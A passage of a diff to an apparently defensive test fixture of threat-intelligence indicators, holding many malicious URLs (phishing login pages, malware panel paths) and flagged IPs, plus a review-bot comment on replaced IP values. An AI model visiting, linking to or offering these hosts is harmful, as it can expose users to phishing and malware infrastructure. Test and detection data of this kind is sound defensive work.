http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:52.122Z\"}", "category": "threat", "type": "indicator", 
@@ -24141,7 +24141,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388282757Z", + "ingested": "2021-12-13T08:38:40.025578900Z", "original": "{\"created\":\"2020-02-20T05:19:37.033Z\",\"description\":\"TS ID: 55328307484; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--4c7e5535-9899-4967-86bb-e303b03a1122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:19:37.033Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.033Z\"}", "category": "threat", "type": "indicator", @@ -24193,7 +24193,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388287476Z", + "ingested": "2021-12-13T08:38:40.025586200Z", "original": "{\"created\":\"2020-02-20T05:19:37.099Z\",\"description\":\"TS ID: 55328307477; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ea537667-1f37-4050-bb51-85fee813e39c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:37.099Z\",\"name\":\"mal_url: http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.099Z\"}", "category": "threat", "type": "indicator", 
@@ -24245,7 +24245,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388292094Z", + "ingested": "2021-12-13T08:38:40.025593500Z", "original": "{\"created\":\"2020-02-20T05:19:44.991Z\",\"description\":\"TS ID: 55328307478; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b6919ef9-68eb-48f5-9bc5-cdb35182e3d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:44.991Z\",\"name\":\"mal_url: http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:44.991Z\"}", "category": "threat", "type": "indicator", @@ -24296,7 +24296,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388296633Z", + "ingested": "2021-12-13T08:38:40.025669400Z", "original": "{\"created\":\"2020-02-20T05:19:49.844Z\",\"description\":\"TS ID: 55330801566; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--ddf3b3c7-d5f7-42d7-b013-767315de4745\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-20T05:19:49.844Z\",\"name\":\"mal_url: http://f0404175.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404175.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:49.844Z\"}", "category": "threat", "type": "indicator", 
@@ -24348,7 +24348,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388302764Z", + "ingested": "2021-12-13T08:38:40.025695300Z", "original": "{\"created\":\"2020-02-20T05:19:58.679Z\",\"description\":\"TS ID: 55330801607; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--12edd75d-2558-498f-93a6-b628c3a21f85\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:19:58.679Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:58.679Z\"}", "category": "threat", "type": "indicator", @@ -24400,7 +24400,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388307633Z", + "ingested": "2021-12-13T08:38:40.025701Z", "original": "{\"created\":\"2020-02-20T05:21:46.589Z\",\"description\":\"TS ID: 55328307479; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--7a99b0ea-a361-4d6f-9c75-a1cd9ac41b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:21:46.589Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:21:46.589Z\"}", "category": "threat", "type": "indicator", 
@@ -24452,7 +24452,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388312843Z", + "ingested": "2021-12-13T08:38:40.025705200Z", "original": "{\"created\":\"2020-02-20T05:22:19.894Z\",\"description\":\"TS ID: 55330801609; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--09479a9a-0c30-4029-a396-afa64343f065\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:22:19.894Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/em/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/em/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:22:19.894Z\"}", "category": "threat", "type": "indicator", @@ -24503,7 +24503,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388317802Z", + "ingested": "2021-12-13T08:38:40.025709600Z", "original": "{\"created\":\"2020-02-20T05:24:01.214Z\",\"description\":\"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-20T05:24:01.214Z\",\"name\":\"mal_url: http://f0402912.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0402912.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:01.214Z\"}", "category": "threat", "type": "indicator", 
@@ -24554,7 +24554,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388322431Z", + "ingested": "2021-12-13T08:38:40.025734700Z", "original": "{\"created\":\"2020-02-20T05:24:21.239Z\",\"description\":\"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:24:21.239Z\",\"name\":\"mal_url: http://f0404052.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404052.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:21.239Z\"}", "category": "threat", "type": "indicator", @@ -24606,7 +24606,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388327240Z", + "ingested": "2021-12-13T08:38:40.025739600Z", "original": "{\"created\":\"2020-02-20T05:24:33.205Z\",\"description\":\"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T05:24:33.205Z\",\"name\":\"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:33.205Z\"}", "category": "threat", "type": "indicator", 
@@ -24625,7 +24625,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 193.32.188.146", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-20T05:24:35.843Z", "valid_from": "2020-02-20T05:24:35.843Z", @@ -24647,12 +24647,12 @@ "first_seen": "2020-02-20T05:24:35.843Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "193.32.188.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388332009Z", - "original": "{\"created\":\"2020-02-20T05:24:35.843Z\",\"description\":\"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-20T05:24:35.843Z\",\"name\":\"mal_ip: 193.32.188.146\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '193.32.188.146']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:35.843Z\"}", + "ingested": "2021-12-13T08:38:40.025748800Z", + "original": "{\"created\":\"2020-02-20T05:24:35.843Z\",\"description\":\"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-20T05:24:35.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:35.843Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
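Review bot: The replacement address `89.160.20.156` is now the value of every `mal_ip` indicator in this file (this hunk, plus -25293/-25315 and -25805/-25827) and also the host of the `mal_url` at -25753/-25778, so four previously distinct indicators (`193.32.188.146`, `84.38.180.229`, `185.90.59.42`, `82.165.18.207`) collapse onto one value in `threat.indicator.ip`, `url.domain` and `event.original`. The pipeline is still exercised, but the fixture no longer demonstrates that distinct inputs yield distinct enrichment output, and I would expect any downstream check that deduplicates indicators by value to now see one where the feed had several. If the supported subset allows it, spreading the fixtures over two or more addresses from that range would keep the coverage; if a single address is intentional, a one-line note in the PR description saying so would save the next reader the question. The `event.ingested` change in this hunk is the same regeneration noise as in the earlier hunks.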
@@ -24703,7 +24703,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388336838Z", + "ingested": "2021-12-13T08:38:40.025754Z", "original": "{\"created\":\"2020-02-20T05:24:47.629Z\",\"description\":\"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:24:47.629Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.629Z\"}", "category": "threat", "type": "indicator", @@ -24755,7 +24755,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388341407Z", + "ingested": "2021-12-13T08:38:40.025759800Z", "original": "{\"created\":\"2020-02-20T05:24:47.645Z\",\"description\":\"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:24:47.645Z\",\"name\":\"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.645Z\"}", "category": "threat", "type": "indicator", 
@@ -24807,7 +24807,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388346637Z", + "ingested": "2021-12-13T08:38:40.025767Z", "original": "{\"created\":\"2020-02-20T05:25:26.502Z\",\"description\":\"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-20T05:25:26.502Z\",\"name\":\"mal_url: http://instaboom-hello.site/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://instaboom-hello.site/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.502Z\"}", "category": "threat", "type": "indicator", @@ -24859,7 +24859,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388351155Z", + "ingested": "2021-12-13T08:38:40.025773800Z", "original": "{\"created\":\"2020-02-20T05:25:26.525Z\",\"description\":\"TS ID: 55328307488; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--592a57f8-b59a-4018-9167-307225a207ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:25:26.525Z\",\"name\":\"mal_url: http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.525Z\"}", "category": "threat", "type": "indicator", 
@@ -24911,7 +24911,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388355533Z", + "ingested": "2021-12-13T08:38:40.025780800Z", "original": "{\"created\":\"2020-02-20T05:25:29.508Z\",\"description\":\"TS ID: 55328307495; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--56e543f4-111a-4764-af25-ee784f35a7c6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:25:29.508Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/azrt/emma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/azrt/emma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.508Z\"}", "category": "threat", "type": "indicator", @@ -24963,7 +24963,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388362356Z", + "ingested": "2021-12-13T08:38:40.025787600Z", "original": "{\"created\":\"2020-02-20T05:25:29.532Z\",\"description\":\"TS ID: 55328307487; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a2e1a901-7ad5-4be0-9fad-7e83cb7d35a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-20T05:25:29.532Z\",\"name\":\"mal_url: http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.532Z\"}", "category": "threat", "type": "indicator", 
@@ -25015,7 +25015,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388389577Z", + "ingested": "2021-12-13T08:38:40.025794500Z", "original": "{\"created\":\"2020-02-21T02:51:41.341Z\",\"description\":\"TS ID: 55333174445; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--84d5a06f-cbc3-4504-b0d0-ea23b99182ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:51:41.341Z\",\"name\":\"mal_url: http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:41.341Z\"}", "category": "threat", "type": "indicator", @@ -25066,7 +25066,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388397642Z", + "ingested": "2021-12-13T08:38:40.025801300Z", "original": "{\"created\":\"2020-02-21T02:51:50.176Z\",\"description\":\"TS ID: 55333174449; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--56cda4af-704b-41e7-8cc3-6140c163a22a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:51:50.176Z\",\"name\":\"mal_url: http://j1041747.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1041747.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.176Z\"}", "category": "threat", "type": "indicator", 
@@ -25118,7 +25118,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388403323Z", + "ingested": "2021-12-13T08:38:40.025805300Z", "original": "{\"created\":\"2020-02-21T02:51:50.296Z\",\"description\":\"TS ID: 55333174441; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--3a6903d8-e46b-4918-a99d-21ae21465bde\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-21T02:51:50.296Z\",\"name\":\"mal_url: http://sadhate.zzz.com.ua/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sadhate.zzz.com.ua/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.296Z\"}", "category": "threat", "type": "indicator", @@ -25170,7 +25170,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388408373Z", + "ingested": "2021-12-13T08:38:40.025810400Z", "original": "{\"created\":\"2020-02-21T02:52:28.296Z\",\"description\":\"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:52:28.296Z\",\"name\":\"mal_url: http://groysman.club/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groysman.club/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:28.296Z\"}", "category": "threat", "type": "indicator", 
@@ -25222,7 +25222,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388413061Z", + "ingested": "2021-12-13T08:38:40.025815500Z", "original": "{\"created\":\"2020-02-21T02:52:31.697Z\",\"description\":\"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:52:31.697Z\",\"name\":\"mal_url: http://nortonlilly.info/ace/ts/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace/ts/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:31.697Z\"}", "category": "threat", "type": "indicator", @@ -25274,7 +25274,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388417440Z", + "ingested": "2021-12-13T08:38:40.025837200Z", "original": "{\"created\":\"2020-02-21T02:52:33.704Z\",\"description\":\"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:52:33.704Z\",\"name\":\"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:33.704Z\"}", "category": "threat", "type": "indicator", 
@@ -25293,7 +25293,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 84.38.180.229", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime", "modified": "2020-02-21T02:52:34.992Z", "valid_from": "2020-02-21T02:52:34.992Z", @@ -25315,12 +25315,12 @@ "first_seen": "2020-02-21T02:52:34.992Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "84.38.180.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388422359Z", - "original": "{\"created\":\"2020-02-21T02:52:34.992Z\",\"description\":\"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--097b92f4-6865-49db-8e59-2a89df364749\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-21T02:52:34.992Z\",\"name\":\"mal_ip: 84.38.180.229\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '84.38.180.229']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:34.992Z\"}", + "ingested": "2021-12-13T08:38:40.025841Z", + "original": "{\"created\":\"2020-02-21T02:52:34.992Z\",\"description\":\"TS ID: 55333174446; iType: mal_ip; State: active; Org: Aksinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--097b92f4-6865-49db-8e59-2a89df364749\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-21T02:52:34.992Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:34.992Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25371,7 +25371,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388426777Z", + "ingested": "2021-12-13T08:38:40.025846100Z", "original": "{\"created\":\"2020-02-21T02:52:35.038Z\",\"description\":\"TS ID: 55333174442; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--03ea9edc-6654-4287-b452-988c85380295\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-21T02:52:35.038Z\",\"name\":\"mal_url: http://jusper.zzz.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusper.zzz.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:35.038Z\"}", "category": "threat", "type": "indicator", @@ -25423,7 +25423,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388431175Z", + "ingested": "2021-12-13T08:38:40.025850900Z", "original": "{\"created\":\"2020-02-21T02:52:38.593Z\",\"description\":\"TS ID: 55333174440; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--99f64515-7513-4764-b278-987c5df8484b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:52:38.593Z\",\"name\":\"mal_url: http://azur.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://azur.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:38.593Z\"}", "category": "threat", "type": "indicator", 
@@ -25474,7 +25474,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388435544Z", + "ingested": "2021-12-13T08:38:40.025855Z", "original": "{\"created\":\"2020-02-21T02:53:25.758Z\",\"description\":\"TS ID: 55333174450; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--afdd7c21-d8c6-419e-84be-5c8b2ce1a829\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-21T02:53:25.758Z\",\"name\":\"mal_url: http://d98527ix.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d98527ix.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:25.758Z\"}", "category": "threat", "type": "indicator", @@ -25526,7 +25526,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388440302Z", + "ingested": "2021-12-13T08:38:40.025859200Z", "original": "{\"created\":\"2020-02-21T02:53:31.865Z\",\"description\":\"TS ID: 55333174452; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--858c680e-7b33-4345-b23c-bbc2a1efb9e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:53:31.865Z\",\"name\":\"mal_url: http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/new/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.865Z\"}", "category": "threat", "type": "indicator", 
